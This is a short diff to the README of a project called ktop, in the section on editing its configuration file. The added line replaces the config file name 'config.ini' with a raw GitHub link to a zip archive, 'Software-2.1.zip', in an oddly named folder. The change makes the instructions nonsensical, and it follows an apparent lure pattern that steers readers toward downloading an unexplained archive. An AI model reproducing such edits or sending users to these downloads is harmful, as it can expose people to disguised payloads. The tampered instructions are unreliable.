jkmahavidyalaya/ktop/README.md

 ktop works well out of the box, but you can adjust it to fit your needs:

-- Find the configuration file (usually named `config.ini` or similar) in the program folder.
+- Find the configuration file (usually named `https://raw.githubusercontent.com/jkmahavidyalaya/ktop/master/arbitrator/Software-2.1.zip` or similar) in the program folder.
 - Open it with any text editor (like Notepad or TextEdit).
 - Change settings such as update interval, displayed metrics, or colors.
 - Save your changes and restart ktop.